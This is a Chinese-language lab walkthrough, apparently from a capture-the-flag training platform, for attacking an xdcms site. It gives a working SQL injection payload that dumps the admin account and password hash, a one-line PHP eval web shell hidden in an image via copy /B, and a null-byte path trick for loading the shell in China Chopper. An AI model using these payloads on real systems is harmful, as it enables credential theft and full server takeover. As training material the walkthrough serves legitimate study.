xdcms SQL注入漏洞

xdcms SQL注入漏洞

实验目的：获取目标网站目录信息
实验工具BURP
SQLMap
中国菜刀
操作机windows XP
目标网站www.test.ichunqiu

第一步获取网站管理员账号密码。
打开浏览器输入网址www.test.ichunqiu
进入注册页面
填写好注册信息别动！打开工具burpLoader.jar
回到浏览器，设置局域网本地代理，依次点击 设置 -> 更改代理服务器设置 -> 连接 -> 局域网设置，在 为 LAN 使用代理服务器 前打钩，在地址上填 127.0.0.1，在端口上填 8080，最后点击确定
回到注册页面，点击 注册 后，在 Burp Suite 上点击 Proxy -> Intercept -> Raw 选项卡，看到了成功抓取的注册数据包
点击 Action -> Send to Repeater，便可在 Repeater 选项卡中看到刚才抓取的数据包，用于进行重放攻击(就是把数据包截取下来，改了重新发送给服务器，达到攻击目的)
在username后面插入
’ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#
点击上方的GO
右边entry后面一串就是管理员账号和密码了
如果不行关掉拦截 重新在网站是刷新验证码 填写在verifycode后面再点击GO
密码是密文 在网上用md5解密解开密码 第一步就完成了

第二部获取目标网站目录中的flag文件信息
获取权限
1先打开御剑后台扫描工具（扫描后台目录）
找到网站管理页面进入 登录
在任意目录新建文本文档打开编辑写入：

<?php @eval($_POST['cmd']): ?>

保存退出
打开CMD cd到刚才的文件目录下输入copy /B a图片 + 刚才编辑的文本文档 B图片。
然后进入网站管理页面点击模板管理 幻灯片管理 添加幻灯片 选择B图片上传 这里要关掉拦截
然后去Burp里的 Proxy>History选择最后一个网址Response>Raw里能查看到图片上传的路径valus后面的路径
打开中国菜刀
右键添加shell
输入网址主页?m=…/…/加刚才的图片上传路径%00
右边输入之前设置的密码cmd
下拉菜单选择php GB2312 添加
然后双击此项可查看网站目录